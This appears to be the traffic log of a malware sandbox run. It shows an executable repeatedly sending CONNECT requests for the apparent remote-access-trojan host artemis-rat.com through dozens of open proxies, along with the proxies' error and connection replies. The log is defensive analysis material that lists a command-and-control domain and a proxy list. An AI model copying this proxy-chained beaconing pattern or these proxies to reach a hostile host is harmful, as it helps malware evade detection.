Mar 11, 2024 03:30:45.889925957 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:49.405349970 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:52.889482975 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:59.905040026 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            376192.168.2.55093775.119.145.154157793876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.089651108 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.732964993 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.623711109 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            377192.168.2.5509435.252.23.22010813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.095952988 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            378192.168.2.55103938.162.11.21631283876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.095963955 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.510152102 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
Data Ascii: Proxy Authentication Required


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
379192.168.2.550985147.75.92.251100893876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.098901987 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.380642891 CET | 65 | IN | HTTP/1.1 200 Connection Established
Proxy-Agent: Zscaler/6.3


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
380192.168.2.550991184.185.2.1241453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.103272915 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
381192.168.2.55091731.43.158.10888883876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.103971958 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
382192.168.2.550789111.206.0.9981813876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.104561090 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.105659962 CET | 162 | IN | HTTP/1.1 200 Connection Established
Accept-Ranges: bytes
Content-Length: 0
Date: Mon, 11 Mar 2024 02:30:39 GMT
Server: eJet/1.4.2
X-Nat-IP: 154.16.105.38


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
383192.168.2.55100972.206.181.12341453876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.106568098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
384192.168.2.551112162.214.227.68553923876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.107115030 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.592312098 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:40.139303923 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
385192.168.2.551065162.241.6.97467833876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.116297007 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
386192.168.2.551145185.238.228.96803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.125087976 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.279345989 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
387192.168.2.551147104.21.223.181803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.126148939 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.280499935 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            388192.168.2.55095146.253.143.14410803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.128473997 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            389192.168.2.551043200.125.184.569993876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.129640102 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.701693058 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.827707052 CET | 19 | IN | HTTP/1.1 200 OK


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            390192.168.2.550191194.233.78.142355133876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.133299112 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:42.201843977 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:45.202414989 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:51.202086926 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:31:03.201828957 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            391192.168.2.551166203.30.190.57803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.135915041 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.293533087 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            392192.168.2.551164162.159.242.230803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.141036034 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.306814909 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            393192.168.2.551061184.178.172.28152943876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.142143965 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                                            394192.168.2.551186104.21.102.95803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.145020008 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.305057049 CET | 316 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:39 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
395192.168.2.551159159.65.77.16885853876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.150468111 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.326426029 CET | 311 | IN | HTTP/1.1 400 Bad Request
Server: nginx
Date: Mon, 11 Mar 2024 02:30:38 GMT
Content-Type: text/html
Content-Length: 166
Connection: close
Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
396192.168.2.551216104.23.100.73803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.183171988 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.337867975 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:39 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
397192.168.2.55107672.210.252.134461643876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.183262110 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
398192.168.2.55100851.75.125.208481143876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.183495998 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
399192.168.2.551019212.118.43.143803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.183631897 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:54.890126944 CET | 316 | IN | HTTP/1.1 400 Bad Request
Server: cloudflare
Date: Mon, 11 Mar 2024 02:30:54 GMT
Content-Type: text/html
Content-Length: 155
Connection: close
CF-RAY: -
Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
400192.168.2.55097543.255.113.23280843876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.183784008 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:39.538110971 CET | 208 | IN | HTTP/1.0 404 Not Found
Server: HCS
Date: Mon, 11 Mar 2024 05:18:02 GMT
Content-Type: text/html
Content-Length: 432
HCS-Error: ERR_FTP_NOT_FOUND 0
X-NGAA: MISS from CH-XW-NO1-315.4
Connection: close

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
401192.168.2.551049217.112.80.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.184104919 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive
Mar 11, 2024 03:30:41.373616934 CET | 857 | IN | HTTP/1.1 500 Internal Server Error
Date: Mon, 11 Mar 2024 02:30:41 GMT
Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27
Content-Length: 640
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at postmaster@localhost to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27 Server at artemis-rat.com Port 443</address></body></html>

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
402192.168.2.550126154.118.228.212803876C:\Users\user\Desktop\dl7WL77rkA.exe
Timestamp | Bytes transferred | Direction | Data
Mar 11, 2024 03:30:39.184107065 CET | 223 | OUT | CONNECT artemis-rat.com:443 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
Host: artemis-rat.com
Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            403192.168.2.55103851.15.210.79163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184166908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.811101913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.686093092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:42.990741968 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            404192.168.2.55122785.31.234.252803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.184176922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.639225960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
